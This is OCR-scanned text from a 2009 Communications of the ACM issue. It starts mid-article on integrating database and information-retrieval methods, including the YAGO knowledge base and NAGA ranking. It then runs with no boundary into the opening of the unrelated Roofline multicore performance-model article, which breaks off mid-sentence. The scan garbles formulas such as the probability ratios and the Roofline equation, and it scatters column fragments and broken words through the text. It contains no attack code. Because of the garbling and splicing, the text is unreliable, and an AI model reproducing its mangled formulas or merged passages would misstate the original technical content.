nario involving, say, relational tables 
with the following schemas (attribute 
names and types, unique keys under- 
lined): 


Disease (Did int; Name char[{50]; Cat- 
egory int; Pathogen char[50]; ... ) 


Patient (Pld int; ... ; Age int; Treated- | 


Did int; ResponsibleHId int; Timestamp 
date; Report longtext; ...) 


Hospital (HId int; Address char[200]; | 
| be at the border or just outside of cen- 


eo) 


Some of the information, especially 
foreign-key references between rela- 
tions (such as a patient record refer- 
ring to a disease identifier), is suitable 
for structured queries. But long text 
fields, often containing valuable la- 
tent information, are amenable to only 
keyword and text-similarity search. 
Moreover, some of the attributes (such 
as Category) may refer to external tax- 
onomies and ontologies (such as the 
Unified Medical Language System). 

To illustrate the nature of querying 
such data, consider an information 
request (such as “Find young patients 
in central Europe who have been re- 


ported, in the past two weeks, to have | 


symptoms of tropical virus diseases 
and an indication of anomalies”). 
Computing relevant answers requires 
evaluating structured predicates 
(such as range conditions on Age and 
joins with additional ontology tables 
for identifying the values of Disease— 
Name, Category, Pathogen—referring 
to tropical virus diseases). This com- 
putation also involves fuzzy predicates 


on Report to test the “anomaly” condi- 
tion. Moreover, hospital Address must 
be matched against geographic taxon- 
omies with some inherent vagueness 
(such as about, say, whether England 
and Italy are part of central Europe). 
Finally, with such fuzzy matching and 
similarity tests it is absolutely neces- 
sary for the query engine to be able 
to provide meaningful rankings of 
the results. For example, a case with 
strong evidence of anomalies that may 


tral Europe or happened just outside 
the two-week time window should 
rank higher than a case that satisfies 
the structured (and spatio-temporal) 
conditions very well, though little evi- 
dence in the Report suggests it was 
particularly anomalous. 

Structured and — unstructured 
search conditions are combined in 
a single query, and the query results 
must be ranked. The queries must be 
evaluated over very large data sets that 
exhibit high update rates as new cases 
of diseases are added. A programmer 
can build such an application through 
two separate platforms—a DB sys- 
tem for the structured data and an 
IR search engine for the textual and 
fuzzy-matching issues. But this widely 
adopted approach is a challenge to ap- 
plication developers, as many tasks 
are not covered by the underlying plat- 
forms and must be addressed in the 
application code. An integrated DB/IR 
platform would greatly simplify devel- 
opment of the application and largely 
reduce the cost of maintaining and 
adapting it to future needs. 


Figure 1: Past, present, and future of DB and IR methods. 
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Figure 2: Excerpt from the YAGO knowledge base. 
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Abstracting from this application- 
centric discussion, we have identified 
several compelling motivations for 
bringing IR concepts to DB systems 
and vice versa, leading to the follow- 
ing DB and IR concepts and methods 
a developer would find useful: 

Approximate matching and record 
linkage. Adding text-matching func- 
tionality to DB systems often entails 
approximate matching (such as due to 
spelling variants) and when text fields 
refer to named entities lead to record 
linkage for matching entities. For ex- 
ample, the strings “William J. Clin- 
ton” and “Bill Clinton” likely denote 
the same person, and the names “M- 
31” and “NGC 224” should be recon- 
ciled to denote the Andromeda galaxy. 
Approximate matching by similarity 
measures requires IR-style ranking. 

Too-many-answers ranking. Prefer- 
ence search of, say, travel portals and 
product catalogs often poses a too- 
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many-answers problem. Narrowing the 
query conditions may overshoot by pro- 
ducing too few or even no results; inter- 
active reformulation and browsing is 
time-consuming and might irritate us- 
ers. Large result sets inevitably require 
ranking based on data and/or workload 
statistics, as well as on user profiles; 
Schema relaxation and heterogene- 
ity. In the DB world, the norm is that 
applications access multiple data- 
bases, often with a run-time choice of 
the data sources. Even if each source 
contains structured data records and 
comes with an explicit schema, there 
is no unified global schema unless a 
breakthrough could be achieved to 
magically perform perfect on-the-fly 
data integration. So the application 
program must be able to cope with the 
heterogeneity of the underlying sche- 
ma names, XML tags, and Resource 
Description Framework (RDF) prop- 
erties, and queries must be schema- 
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Location 


subclass 
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agnostic or at least tolerant to schema 
relaxation; 

Information extraction and uncertain 
data. Textual information contains 
named entities and relationships in 
natural-language sentences that can 
be made explicit through information- 
extraction techniques (pattern match- 
ing, statistical learning, and natural- 
language processing). However, this 
approach can lead to large knowledge 
bases with facts that exhibit uncer- 
tainty; querying extracted facts thus 
entails ranking. 

Entity search and ranking. Recogniz- 
ing entities in text sources allows enti- 
ty-search queries about, say, electron- 
ics products, travel destinations, and 
movie stars, boosting search capabili- 
ties on intranets, portals, news feeds, 
and the business- and entertainment- 
oriented parts of the Web. Extract- 
ing binary relations between entities, 
as well as place and time attributes, 
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could pave the way toward semantic IR 
on digital libraries (such as PubMed), 
news, and blogs and also aid natural- 
language question answering and 
searching the deep, or hidden, Web. 


Harvesting, Searching, 

Ranking the Web 

The Web has the potential for being the 
world’s most comprehensive knowl- 
edge base, but we are still far from ex- 


ploiting it. Valuable scientific and cul- | 


tural content is all mixed up with huge 
amounts of noisy, low-quality, unstruc- 
tured text and media. The challenge is 
how to extract the important facts from 
the Web and organize them into an 


explicit knowledge base that captures | 


entities and semantic relationships 
among them. Imagine a formally struc- 


tured Wikipedia with the same scale | 


and richness as Wikipedia itself but 
that offers a precise and concise rep- 
resentation of knowledge that enables 
expressive and precise querying. 

Figure 2 outlines what such a knowl- 
edge base might look like, depicting an 
excerpt from our own Yet Another Great 
Ontology (YAGO) knowledge base,” a 
typed entity-relationship graph that can 
be represented in the RDF or Owl-Lite 
data models. Building and maintain- 
ing it in a largely automated manner is 
not only difficult but an opportunity for 
computer science to contribute toward 
high-value assets for science, culture, 
and society. DB and IR methods could 
indeed have the potential to play major 
roles in this endeavor. 

With a knowledge base that subli- 
mates valuable content from the Web, 


we could address difficult questions | 


beyond the capabilities of today’s key- 
word-based search engines. For exam- 
ple, a user might ask for a list of drugs 
that inhibit proteases and obtain a fair- 
ly comprehensive list of drugs for this 
HIV-relevant family of enzymes. Such 
advanced information requests are 
posed by knowledge workers, includ- 


ing scientists, students, journalists, | 


historians, and market researchers. 
Although it is possible to find relevant 
answers, the process is laborious and 


time-consuming, as it often requires | 
and browsing | 


rephrasing queries 
through many potentially promising 
but ultimately useless result pages. 
The following example questions illus- 
trate this complexity: 
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Which German Nobel laureate sur- 
vived both world wars and outlived all 
four of his children? The answer is Max 
Planck. The bits and pieces needed to 


| answer are not difficult to locate: lists 
| of Nobel prize winners, birth and death 


dates of the relevant people, the names 
of family members extracted from biog- 
raphies, and dates associated with the 
various children. Gathering and con- 
necting these facts is straightforward 
for a human but could take them days 
of manually inspecting Web pages. 
Which politicians are also accom- 
plished scientists? Today’s search en- 


gines fail on such questions because | 


they match words and return pages 
rather than identify entities (such as 
persons) and test their relationships. 
Moreover, the question entails a dif- 
ficult ranking problem. Wikipedia 
alone contains hundreds of names 
listed in the categories “Politicians” 
and “Scientists.” An insightful answer 
must rank important people first, say, 
the German chancellor Angela Merkel, 


| who has a doctoral degree in physical 


chemistry, and Benjamin Franklin, 
who made scientific discoveries and 
was a founding father of the U.S. 

How are Max Planck, Angela Merkel, 
Jim Gray, and the Dalai Lama related? 
All four have doctoral degrees from 
German universities (honorary doc- 
torates for Gray and the Dalai Lama). 
Discovering interesting facts about 
multiple entities and their connec- 


tions on the Web is virtually impos- | 


sible due to the sheer amount of in- 
terconnected pages about these four 
famous people. 

Note that even though the ques- 
tions are asked in natural language, 
they would remain equally difficult to 


answer even if expressed in a formal | 
language. Conversely, a rich knowl- | 


edge base of entities and relationships 
would enable much more effective 
natural-language question answering. 

Information organization and 
search on the Web are being augment- 
ed with increasingly sophisticated 


structure, context awareness, and se- 


mantic flavor in the form of faceted 
search, vertical-domain search, entity 
search, and deep-Web search. All ma- 
jor search engines recognize a large 
fraction of worldwide product names, 
have built-in knowledge about geo- 
graphic locations, and return high- 
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precision results for popular queries 
about consumer interests, travel, and 
entertainment. Information-extrac- 
tion and entity-search methods are 
clearly at work. But these efforts focus 
only on specific domains. Generaliz- 
ing the approach toward a universal 
methodology for knowledge harvest- 
ing requires bolder steps, and three 
major research avenues promise to 
contribute to this goal: 
Semantic-Web-style knowledge re- 
positories (such as ontologies and tax- 
onomies). Included are general-pur- 
pose ontologies and thesauri (such 
as SUMO, OpenCyc, and WordNet), 
as well as domain-specific ontologies 
and terminological taxonomies (such 
as GeneOntology and UMLS in the 


| biomedical domain); 


Large-scale information extraction 
(IE) from text sources in the spirit of a 
Statistical Web. IE methods—entity 
recognition and learning relational 
patterns—are increasingly scalable 
and less dependent on human super- 
vision? !*?!; and 

Social tagging and Web 2.0 communi- 
ties that constitute the social Web. Hu- 
man contributions are abundant in the 
form of semantically annotated Web 
pages, phrases in pages, images, and 
videos, together providing “wisdom of 
the crowds.” Freebase and other such 
endeavors collect structured data re- 
cords from human communities. Wiki- 
pedia is another example of the Social 
Web paradigm, including semistruc- 
tured data (such as infoboxes) that can 
be augmented with explicit facts.” 

Research projects often combine 
elements of the semantic, statistical, 
and social approaches. Here, we dis- 
cuss several interesting projects, high- 
lighting YAGO results: 

Libra. Aiming to support entity 
search on the Web, the Microsoft Re- 
search Lab in Beijing has developed 
comprehensive technology for in- 
formation extraction, including pat- 
tern-matching algorithms tailored to 
typical Web-page layouts and trained 
learning of patterns using advanced 
models (such as hierarchical condi- 
tional random fields**). A particularly 
fruitful focus is to extract entities and 
their attributes from product-related 
pages with HTML tables and lists. 
These methods and tools are being 
used to build and maintain several 


vertical-domain portals, including 
product search and the Libra portal 
for scholarly search on extracted re- 
cords about authors, papers, confer- 
ences, and communities. 

Once the facts are gathered and or- 
ganized into searchable form, a typi- 
cal IR issue arises concerning how a 
system should rank the results of an 
entity-centric query. To this end, an 
advanced statistical language model 
(LM) has been extended from the form 
of document-oriented bags of words 
to the form of structured records.”° 

Libra is an example of the Statisti- 
cal-Web approach. 


Cimple/DBLife. The Cimple proj- | 


ect,''”’ being carried out jointly by the 
University of Wisconsin and Yahoo! 
Research, is similar to Libra, aiming 
to generate and maintain community- 
specific portals with structured infor- 
mation gathered from Web sources. 
However, it applies a number of meth- 


ods to achieve this goal, as we illustrate . 


by discussing its flagship application: 
the DBLife portal. 

DBLife features automatically com- 
piled “super-homepages” of research- 
ers with bibliographic data, as well as 
facts about community services (such 
as PC work), colloquium lectures, and 
more. For gathering and_ reconcil- 
ing these facts, Cimple has a suite of 


DB-style extractors based on pattern | 


matching and dictionary lookups. The 
extractors are combined into execu- 
tion plans and periodically applied to 
a carefully selected set of relevant Web 
sources, including prominent sites like 
DBLP and the Dbworld archive and im- 
portant conference and university pag- 
es that are selected semi-automatically. 
While the overall approach makes use 
of IR concepts like tf*idf-based ranking 
and Web-graph link analysis, Cimple 
emphasizes a more DB-oriented toolkit 
for declarative extraction programs, us- 
ing Datalog as a query-language frame- 
work and DB rewriting techniques for 
query optimization.”” 

Cimple leans more toward the Se- 
mantic-Web approach and less toward 
a Statistical-Web approach. In addi- 
tion, it contains Social-Web elements, 
most notably, a Wiki-based mecha- 
nism for users to provide feedback 
about incorrect facts they identify on 
community portals. 

KnowItAll/TextRunner. 


Both Libra | 


The challenge 

is how to extract 
the important 
facts from the 
Web and organize 
them into an 
explicit knowledge 
base that 
captures entities 
and semantic 
relationships 
among them. 
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and Cimple operate on the basis of one 
page at a time, then aim to extract as 
many facts as possible from the given 
page. A dual view is to focus on one or 
more entity types or relationship types, 


_ aiming to populate them by inspect- 


ing many pages and exploiting their 
redundancies. For example, a user 
might want to find all cities on planet 
Earth, along with all scientists, guitar 
players, and other unary relations (en- 
tity types). For binary relations, a user 
might consider gathering all CEOs 
of all companies, all (city, river) pairs 
where a city is located on a river, or the 
answers to questions like: Who discov- 
ered what? and Which enzyme triggers 
which biochemical process? 

The KnowlItAll project®®'? at the 
University of Washington in Seattle 


_ has pursued this goal, using tech- 


niques that combine pattern match- 
ing, linguistic analysis, and statistical 
learning. KnowlItAll starts with a set of 
seeds: the instances of the relation of 
interest (such as a set of cities or a set 
of (city, river) pairs).'!* This is the only 
“training input” needed by KnowlItAll, 
which automatically finds sentences 
on the Web with the seeds, extracts lin- 
guistic patterns surrounding the seeds, 
performs statistical analyses to identify 
strong patterns, and finally identifies 
the most useful patterns to obtain ex- 
traction rules. For example, the phrase 
templates “located in downtown $x” 
and “$x is located on the banks of Sy” 
may be determined to be good rules for 
extracting cities and (city, river) pairs, 
respectively. Now these rules can be ap- 
plied to newly seen Web pages, yielding 
facts or fact candidates, some in turn 
considered as new, additional seeds. 
Needed are statistical inferences to 
identify good rules and assess the con- 
fidence in the harvested facts. 

The TextRunner tool’ pays special 
attention to scalability and simplifies 
the entire fact-gathering pipeline. It 
has a completely unsupervised boot- 


_ strapping phase for identifying simple 
| patterns, just enough to identify, with 


high confidence, noun phrases and 
verbal patterns. When TextRunner sees 
anew Web page, it aggressively extracts 
all potentially meaningful instances of 
all possible binary relation types from 
the page text; Banko et al.’ refers to this 
processing mode as open information 
extraction, or “machine reading.” 
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Figure 3: Example queries for the YAGO knowledge base. 


Politician 


Scientist 


KnowlItAll and TextRunner are ex- 
amples of Statistical-Web methods for 
large-scale knowledge acquisition. 


YAGO for Large-Scale 

Semantic Knowledge 

Our YAGO project**** shares 
KnowltAll and TextRunner goal of 
large-scale knowledge harvesting but 
emphasizes high accuracy and con- 
sistency rather than high recall (cov- 
erage). YAGO is best characterized as 


a Semantic-Web approach, gathering | 


its knowledge by (primarily) integrat- 
ing information from Wikipedia and 
WordNet. It also employs text-mining- 
based techniques. 
close to two million entities and about 
20 million facts about them, where 
facts are instances of binary relations. 
Extensive sampling has shown that 
YAGO accuracy is at least 95%, and 
many of its errors (false positives) are 
due to incorrect entries in Wikipedia 
itself. YAGO is publicly available at 
www.mpi-inf.mpg.de/yago/. 

Two Wikipedia assets—infoboxes 
and the category system—are almost 
structured data. Infoboxes are collec- 
tions of attribute name-value pairs 
often based on templates and reused 
for important types of entities (such 
as countries, companies, scientists, 
music bands, and sports teams). For 
example, the infobox for Max Planck 
delivers such data as birth_date = April 
23, 1858, birth_place = Kiel, death_date 
= October 4, 1947, nationality = Ger- 
many, and alma_mater = Ludwig-Max- 
imilians-Universitdt Miinchen. As for 
the category system, the Max Planck 
article is manually placed in such cat- 
egories as German_Nobel_laureates, 
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the | 


YAGO contains | 


Germany 


(bornIn| 
livesIn| 
citizenOf) 
.locatedIn* 


bornOn 


diedOn hasWon 


Nobel Prize 


diedOn 


Nobel_laureates_in_physics, quantum_ 
physics, and University_of_ Munich_ 
alumni. All give YAGO clues about in- 


| stanceOf relations, so it can infer that 


the entity Max Planck is an instance of 
the classes GermanNobelLaureates, 
NobelLaureatesInPhysics, and Uni- 
versityOfMunichAlumni. But YAGO 
must be careful, as the placement in 
category quantum_physics does not 
mean that Max Planck is an instance 
of QuantumPhysics. The YAGO ex- 
tractors employ linguistic processing 
(noun phrase parsing) and mapping 
rules to achieve high accuracy in har- 
vesting the categories information. 
These examples of YAGO informa- 
tion extraction indicate that relying 
solely on Wikipedia infoboxes and cat- 
egories may result in a large but inco- 
herent collection of facts. Forexample, 
we may know that Max Planck is an in- 
stance of GermanNobelLaureates but 
be unable to automatically infer that 
he is also an instance of Germans and 


| of Nobel Laureates. Likewise, the fact 


that he was a physicist does not auto- 


matically tell us he was a scientist. To | 


address these shortcomings, YAGO 
makes intensive use of the WordNet 
thesaurus (lightweight ontology), inte- 
grating the facts it harvests from Wiki- 
pedia with the taxonomic backbone 
provided by WordNet. 

While WordNet knows many ab- 
stract classes and the “is-a” and “part- 
of” relationships among them, it has 
only sparse information about indi- 
vidual entities that would populate 
its classes. The wealth of entities in 
Wikipedia complements WordNet 
nicely; conversely, the rigor and exten- 
sive coverage of WordNet’s taxonomy 
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compensate for the gaps and noise in 
the Wikipedia category system. Each 
individual entity YAGO discovers must 
be mapped into at least one existing 
YAGO class. If this fails, the entity 
and its related facts are not admitted 
into the knowledge base. Analogously, 
classes derived from Wikipedia cat- 
egory names (such as GermanNobel- 
Laureates) must be mapped with a 
subclass relationship to one or more 
superclasses (such as NobelLaure- 
ates and Germans). These procedures 
ensure that YAGO maintains a con- 
sistent knowledge base, where con- 
sistency eliminates dangling entities 
and classes and guarantees that the 
subclass relation is acyclic. 
Kylin/KOG. The “Intelligence in 
Wikipedia” project also extracts in- 
formation from Wikipedia through 
its tools Kylin®’ and Kylin Ontology 
Generator (KOG).*° Whenever an in- 
fobox type includes an attribute in 
some articles but the attribute has 
no value for a given article, Kylin 
analyzes the full text of the article 
to derive the most likely value. Like 
KnowlItAll and TextRunner (but un- 
like Libra, Cimple, and YAGO), Kylin 
pursues open extraction by consider- 
ing all potentially significant attri- 
butes, even if they occur only sparsely 


| in the entire Wikipedia corpus. KOG 


builds on Kylin’s output, unifies attri- 
bute names, derives type signatures, 
and (like YAGO) maps these entities 
onto the WordNet taxonomy through 
statistical relational learning.'? KOG 
goes beyond YAGO by discovering 
new relationship types. It builds on 
the class system of both YAGO and 


| DBpedia,’ along with the entities in 


each class, to train its learning algo- 
rithms for generating the subsump- 
tion graph among classes. 

The Kylin/KOG project combines all 
three knowledge-gathering paradigms: 
Semantic-Web-oriented by being tar- 
geted at infoboxes; Social-Web-based 
by leveraging the input of the large 
Wikipedia community; and Statistical- 
Web-style through learning methods. 


Searching and Ranking 

YAGO with NAGA 

The query language we designed for 
YAGO adopts concepts from the stan- 
dardized SPARQL Protocol and RDF 
Query Language for RDF data but ex- 
tends them through more expressive 
pattern matching and ranking.*!* The 
prototype system that implements 
these features is called NAGA (for Not 
Another Google Answer, www.mpi-inf. 


mpg.de/yago/). Viewing the knowledge | 
base as a graph, users and program- | 


mers alike can construct a query with 
the help of subgraph templates; Figure 
3 outlines three examples related to the 
question scenarios discussed earlier. 


The leftmost query in the Figure | 


about politicians who are also scien- 
tists shows two nodes matched by the 
desired results and one node (labeled 
$x) denoting a variable for which the 
query must find all bindings. The edge 
labels denote relationships and need 
to be matched by the results. Here, 
“isa” is shorthand notation for a com- 
position of two connected edges that 
correspond to the relationships instan- 
ceOf between an entity and a class and 
subclass between two classes. This way 
the user also finds people who belong 
to the classes “mayor” and “physicist.” 


The query in the middle of Figure | 


3 (a simpler variant of the German- 


Nobel-laureate question) generalizes | 


the point about labels referring to 
compositions of relations. The label 


(bornin|livesIn|citizenOf).locatedIn* is | 


a regular expression that allows users 
to avoid overspecifying their informa- 
tion demand. We may be generous 
when we call a person German, and the 
locatedIn relationship often reflects 
geographical hierarchies (such as with 
cities, counties, states, and countries). 

The rightmost query of Figure 3 is a 
broad relatedness query that looks for 
commonalities or other connections 
among several entities. Here again, us- 


| ers or programmers would use regular | 


expressions as edge labels in the que- 
ry’s graph template. 

NAGA queries often return too many 
results and so must rank these results. 
For example, a query like “What is 
known about Einstein?,” which may be 
phrased as a single-edge graph pattern 
isa(Einstein, $y), returns dozens if not 


uninteresting ones like isa(Einstein, 
Entity), isa(Einstein, Organism), and 
isa(Einstein, Colleague). Ranking mod- 
els for such results is much more dif- 
ficult than for traditional search en- 
gines, as the system must consider the 
graph structure in both queries and 


accommodated: 

Informativeness. Users prefer infor- 
mative answers—salient or interest- 
ing facts, as opposed to overly generic 
facts or facts that are trivially known al- 
ready. In the example query about Ein- 
| stein the user would prefer the answers 
isa(Einstein, Physicist) or isa(Einstein, 
NobelLaureate) over the near-trivial re- 
sults or a nontrivial but still less impor- 
tant fact like isa(Einstein, Vegetarian). 
However, when asking a different que- 
ry about noteworthy vegetarians, the 
latter fact should be one of the highest- 
ranked results. Informativeness is a 
query-dependent (and potentially user- 
and-situation-dependent) notion; 

Confidence. Users may occasionally 
find uncertain, dubious, or false state- 
ments in the YAGO knowledge base. 
Each fact is annotated with a confi- 
dence value derived from the fact’s 
original data sources and the extrac- 
tion methods YAGO used. The quality 
of the sources tapped by YAGO can be 


trust measures in the spirit of Google’s 


extractors can be empirically assessed. 
Various ways are available for combin- 
ing these measures into a single con- 
fidence value,” * and high-confidence 
answers are preferred; and 
Compactness. Whenever a query 
returns paths or graphs rather than 
individual nodes, we are interested in 
compact graphs and short paths. For 
example, a query about how Einstein 
and Bohr are related should return a 
short answer path that says something 
like “both are physicists,” rather than 
a convoluted answer like “Einstein 
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| hundreds of results, including many | 


results. Three general criteria must be | 


quantified in terms of authority and | 


PageRank, and the quality of different | 
| as in scientific publications). Methods 
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was a vegetarian like Tom Cruise who 
was born in the same year Bohr died.” 
A good ranking function is needed 
to combine all three criteria. Here, we 
sketch our approach for informative- 
ness. We developed for NAGA a new 
kind of statistical LM for graph-struc- 
tured data and queries. The parameters 
of the model are estimated from corpus 
or workload statistics. Consider the 
simple queries isa(Einstein; $y) about 
Einstein and bornin($y; Frankfurt) 
about people born in Frankfurt. For the 
Einstein query YAGO estimates condi- 
tional co-occurrence probabilities 


P[EinsteinaPhysicist] 
P[Einstein] 


and 


P[EinsteinaVegetarian] 
P[Einstein] 


to compare and rank two possible an- 
swers. For the Frankfurt query YAGO 
computes and compares 


P[Goetheaborn Frankfurt] 
P{bornaFrankfurt] 


against 


P[Weikumaborn*Frankfurt] _ 
P[bornaFrankfurt] 


clearly favoring Goethe as a top result. 

This LM-based ranking allows 
NAGA to rank politicians who are 
also scientists with high informative- 
ness, with Benjamin Franklin, Angela 
Merkel, and other prominent figures 
showing up in the top ranks. So while 
the YAGO knowledge base is primarily 


_ a Semantic-Web endeavor, the rank- 


ing for its search engine is built on 
Statistical-Web assets. 
Despite good progress, these ap- 
proaches face three notable challenges: 
Scalable harvesting. Most new knowl- 
edge is produced in textual form (such 


for natural-language IE face inherent 
trade-offs regarding training effort vs. 
easy deployment and precision vs. re- 
call of the results. Scaling up the IE ma- 
chinery for higher throughput without 
sacrificing quality is a formidable prob- 
lem. For example, can IE tools process 
all blog postings on the planet at the 
same rate they are produced, without 
missing relevant facts or producing too 
many false positives?; 

Expressive ranking. The LM-based 
ranking models pursued by Libra and 
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NAGA should be extended to better 
capture the context of the user and the 
data. User context requires personal- 
ized and task-specific LMs that consid- 
er current location, time, short-term 
history, and intention in the user’s dig- 
ital traces. Data context calls for LMs 
for entity-relationship graphs, aiming 
to better model complex patterns be- 
yond single facts (edges) and consider 
types; and 

Efficient search. Evaluating complex 
query predicates over graphs is com- 
putationally difficult. Moreover, the 
need for ranking suggests that the sys- 
tem should avoid materializing overly 
large numbers of results and better 
aim for solely computing the top-k re- 
sults in a more efficient way.’° 

On a grander scale is the ques- 
tion of which is the most appropriate 
paradigm. The three avenues toward 
comprehensive knowledge _harvest- 
ing—Semantic, Statistical, and So- 


cial Web—are by no means mutually 


exclusive. The projects outlined here 
combine aspects of several of these di- 
rections. Deeper understanding of feed- 
back between and synergies from the 
three paradigms is an overriding theme 
of great potential value to researchers. 
Semantic-Web sources can be powerful 
bootstrap tools for large-scale Statisti- 
cal-Web mining. Statistical-Web tools 
may produce many false hypotheses, 
but they can be assessed by Social-Web 
platforms with large communities of 
users that engage in human-computing 
tasks. Social-Web endeavors in turn are 
often grassroots catalysts for develop- 
ing high-value knowledge repositories 
that eventually become Semantic-Web 
assets; examples are Wikipedia and de- 
rived knowledge bases (such as YAGO 
and DBpedia). 


Conclusion 

We have presented motivations for 
and approaches toward integrating 
the historically separated DB and IR 
methodologies. While deep DB/IR in- 
tegration may be wishful thinking, at 
least for the time being, we observe 
strong trends toward adopting IR con- 
cepts in the DB world and vice versa. 
In addition to applications that must 
be able to manage structured and un- 
structured data or highly heteroge- 
neous information sources, we also 
see increasing interest and success in 
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extracting entities and relationships 
from text sources. The envisioned 
path toward automatically building 
and growing comprehensive knowl- 
edge bases with expressive search and 
ranking capabilities may take a long 
time to mature. In any case, it is an 
exciting and rewarding challenge that 
should appeal to and benefit from in- 
novation in several research commu- 
nities, most notably DB and IR. 
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The Roofline model offers insight on how 


| to improve the performance of software 
| and hardware. 


oofline: 
n Insightful 
isual 
erformance 
Model for 
Multicore 
Architectures 


design. The relatively recent switch | itly addressed local stores. Manufac- 
to multicore means that micropro- | turers will likely offer multiple prod- 
cessors will become more diverse, | ucts with differing numbers of cores 
since no conventional wisdom has yet | to cover multiple price-performance 
emerged concerning their design. For | points, since Moore’s Law will permit 
example, some offer many simple pro- | the doubling of the number of cores 
cessors vs. fewer complex processors, | per chip every two years.’ While di- 
some depend on multithreading, and | versity may be understandable in this 
some even replace caches with explic- time of uncertainty, it exacerbates the 


APRIL 2009 VOL. 52 NO. 4 COMMUNICATIONS OF THE ACM 65 


contributed articles 


already difficult jobs of programmers, 
compiler writers, and even architects. 
Hence, an easy-to-understand model 
that offers performance guidelines 
would be especially valuable. 

Such a model need not be perfect, 


just insightful. The 3Cs (compulsory, | 


capacity, and conflict misses) model 
for caches is an analogy.” It is not per- 
fect, as it ignores potentially important 
factors like block size, block-allocation 
policy, and block-replacement policy. 
It also has quirks; for example, a miss 
might be labeled “capacity” in one de- 
sign and “conflict” in another cache 
of the same size. Yet the 3Cs model 
has been popular for nearly 20 years 
precisely because it offers insight into 
the behavior of programs, helping pro- 
grammers, compiler writers, and archi- 
tects improve their respective designs. 

Here, we propose one such model 
we call Roofline, demonstrating it on 
four diverse multicore computers us- 
ing four key floating-point kernels. 


Performance Models 

Stochastic analytical models*** and 
statistical performance models” can 
accurately predict program perfor- 
mance on multiprocessors but rarely 
provide insight into how to improve 
the performance of programs, compil- 


ers, and computers’ and can be diffi- | 


cult to use by nonexperts.”° 

An alternative, simpler approach 
is “bound and bottleneck analysis.” 
Rather than try to predict perfor- 
mance, it provides “valuable insight 
into the primary factors affecting the 
performance of computer systems. In 
particular, the critical influence of the 
system bottleneck is highlighted and 
quantified.””° 

The best-known example of a per- 
formance bound is surely Amdahl’s 
Law,’ which says the performance gain 
of a parallel computer is limited by the 
serial portion of a parallel program 
and was recently applied to heteroge- 
neous multicore computers.*"'* 


Roofline Model 

For the foreseeable future, off-chip 
memory bandwidth will often be the 
constraining resource in system per- 


formance.”? Hence, we want a model 


that relates processor performance to 
off-chip memory traffic. Toward this 
goal, we use the term “operational in- 
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tensity” to mean operations per byte | 


_ of DRAM traffic, defining total bytes 


accessed as those bytes that go to the 
main memory after they have been fil- 
tered by the cache hierarchy. That is, 
we measure traffic between the caches 
and memory rather than between the 
processor and the caches. Thus, op- 


erational intensity predicts the DRAM | 


bandwidth needed by a kernel on a 
particular computer. 

We say “operational intensity” in- 
stead of, say, “arithmetic intensity”'® or 


“machine balance”®” for two reasons: | 


First, arithmetic intensity and ma- 
chine balance measure traffic between 
the processor and the cache, whereas 
efficiency-level programmers want to 
measure traffic between the caches 
and DRAM. This subtle change allows 


| them to include memory optimiza- 


tions of a computer into our bound- 
and-bottleneck model. Second, we 


think the model will work with kernels 
where the operations are not arithme- 
tic, as discussed later, so we needed a 
more general term than “arithmetic.” 
The proposed Roofline model ties 
together floating-point performance, 
operational intensity, and memory 
performance in a 2D graph. Peak float- 
ing-point performance can be found 
through hardware specifications or 
microbenchmarks. The working sets 


of the kernels we consider here do 


not fit fully in on-chip caches, so peak 
memory performance is defined by 
the memory system behind the cach- 
es. Although one can find memory 
performance through the STREAM 
benchmark,” for this work we wrote 
a series of progressively optimized 
microbenchmarks designed to deter- 
mine sustainable DRAM bandwidth. 
They include all techniques to get the 
best memory performance, including 


Figure 1: Roofline model for (a) AMD Opteron X2 and (b) Opteron X2 vs. Opteron X4. 
(a) 
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prefetching and data alignment. (See 
Section A.1 in the online Appendix’ for 
more detail of how to measure proces- 
sor and memory performance and op- 
erational intensity.) 

Figure 1a outlines the model for a 
2.2GHz AMD Opteron X2 model 2214 
in a dual-socket system. The graph is 
on a log-log scale. The y-axis is attain- 
able floating-point performance. The 


x-axis is operational intensity, varying | 
from 0.25 Flops/DRAM byte-accessed | 


to 16 Flops/DRAM _byte-accessed. 
The system being modeled has peak 
double precision floating-point per- 
formance of 17.6 GFlops/sec and peak 
memory bandwidth of 15GB/sec from 
our benchmark. This latter measure is 
the steady-state bandwidth potential 
of the memory in a computer, not the 
pin bandwidth of the DRAM chips. 

One can plot a horizontal line show- 
ing peak floating-point performance 
of the computer. The actual floating- 
point performance of a floating-point 
kernel can be no higher than the hori- 
zontal line, since this line is the hard- 
ware limit. 

How might we plot peak memory 


performance? Since the x-axis is Flops | 


per Byte and the y-axis is GFlops/sec, 
gigabytes per second (GB/sec)—or 
(GFlops/sec)/(Flops/Byte)—is just a 
line of unit slope in Figure 1. Hence, 
we can plot a second line that bounds 
the maximum floating-point perfor- 
mance that the memory system of 
the computer can support for a given 
operational intensity. This formula 
drives the two performance limits in 
the graph in Figure 1a: 


Peak Floating-Point 


Attainable 3 Performance 
=m 


: im ) Peak Memory 
GFlops/sec men 


Operational 
Intensity 


The two lines intersect at the point 
of peak computational performance 
and peak memory bandwidth. Note that 
these limits are created once per multi- 
core computer, not once per kernel. 

For a given kernel, we can find a 
point on the x-axis based on its opera- 
tional intensity. If we draw a vertical 
line (the pink dashed line in the fig- 
ures) through that point, the perfor- 
mance of the kernel on that computer 


a_ Please go to doi.acm.org/10.1145/1498765.149 | 


8785#supp 


The Roofline sets 
an upper bound 

on performance of 
a kernel depending 
_on the kernel’s 
operational 
intensity. If we 

_ think of operational 
intensity as a 
column that hits 
the roof, either 

it hits the flat part 
of the roof, 
meaning 
performance is 
compute-bound, 
_or performance 

is ultimately 
memory-bound. 
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must lie somewhere along that line. 
The horizontal and diagonal lines 
give this bound model its name. The 
Roofline sets an upper bound on per- 
formance of a kernel depending on 
the kernel’s operational intensity. If 
we think of operational intensity as a 
column that hits the roof, either it hits 
the flat part of the roof, meaning per- 
formance is compute-bound, or it hits 
the slanted part of the roof, meaning 
performance is ultimately memory- 
bound. In Figure 1a, a kernel with 
operational intensity 2.0 Flops/Byte 
is compute-bound and a kernel with 
operational intensity 1.0 Flops/Byte is 
memory-bound. Given a Roofline, you 


_ can use it repeatedly on different ker- 


nels, since the Roofline doesn’t vary. 
Note that the ridge point (where the 
diagonal and horizontal roofs meet) of- 
fers insight into the computer’s overall 
performance. The x-coordinate of the 
ridge point is the minimum operation- 
al intensity required to achieve maxi- 
mum performance. If the ridge point is 
far to the right, then only kernels with 
very high operational intensity can 
achieve the maximum performance 
of that computer. If it is far to the left, 
then almost any kernel can potentially 
hit maximum performance. As we ex- 
plain later, the ridge point suggests 


_ the level of difficulty for programmers 


and compiler writers to achieve peak 
